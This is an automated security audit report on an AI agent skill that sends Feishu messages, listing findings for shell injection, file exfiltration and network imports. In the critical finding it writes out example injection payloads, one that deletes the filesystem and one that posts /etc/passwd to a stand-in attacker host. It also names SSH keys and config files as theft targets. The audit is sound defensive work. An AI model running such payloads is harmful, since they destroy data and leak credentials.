Trust Assessment
feishu-send-message received a trust score of 43/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 1 critical, 2 high, 1 medium, and 0 low severity. Key findings include Suspicious import: urllib.request, Potential data exfiltration: file read + network send, Shell command injection via unsanitized message argument in documentation example.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Shell command injection via unsanitized message argument in documentation example The skill's documentation explicitly provides an example of how to send long messages using shell command substitution: `python send_message.py "3b3ee7d1" "$(cat long_message.txt)"`. This pattern allows for arbitrary shell command injection. If an attacker can control the second argument passed to the `send_message.py` script, they can embed malicious shell commands (e.g., `$(rm -rf /)` or `$(curl attacker.com -d @/etc/passwd)`) which will be executed by the shell before the Python script is invoked. This bypasses any internal Python sanitization and leads to remote code execution. The skill should not be invoked in a way that allows shell expansion of user-controlled arguments. If the skill is intended to be called by an LLM, the LLM should be instructed to pass arguments directly without shell interpretation. The documentation should remove this dangerous example. For long content, consider accepting input via standard input (stdin) or a securely managed temporary file. | LLM | SKILL.md:160 | |
| HIGH | Potential data exfiltration: file read + network send Function 'upload_file' reads files and sends data over the network. This may indicate data exfiltration. Review this function to ensure file contents are not being sent to external servers. | Static | skills/lycohana/feishu-send-message/scripts/send_message.py:256 | |
| HIGH | Arbitrary file read and exfiltration via `--file` argument The `scripts/send_message.py` script allows users to specify a file path via the `--file <path>` command-line argument. The `main` function directly passes this user-provided `file_path` to the `upload_file_to_feishu` function. The `upload_file_to_feishu` function then reads the content of the specified file from the filesystem using `open(file_path, 'rb')` and uploads it to the Feishu API. This enables an attacker to read and exfiltrate arbitrary files from the system (e.g., `/etc/passwd`, `~/.openclaw/openclaw.json`, `~/.ssh/id_rsa`) by providing a malicious file path. Implement strict validation and sanitization for the `file_path` argument. Only allow files from a predefined, secure directory, or require explicit user confirmation for file uploads. Avoid directly using user-provided paths for file operations. Consider using a temporary file upload mechanism or a more controlled file selection interface that does not expose arbitrary filesystem access. | LLM | scripts/send_message.py:135 | |
| MEDIUM | Suspicious import: urllib.request Import of 'urllib.request' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/lycohana/feishu-send-message/scripts/send_message.py:25 |
Scan History
Embed Code
[](https://skillshield.io/report/b04c90d3a4fad66e)
Powered by SkillShield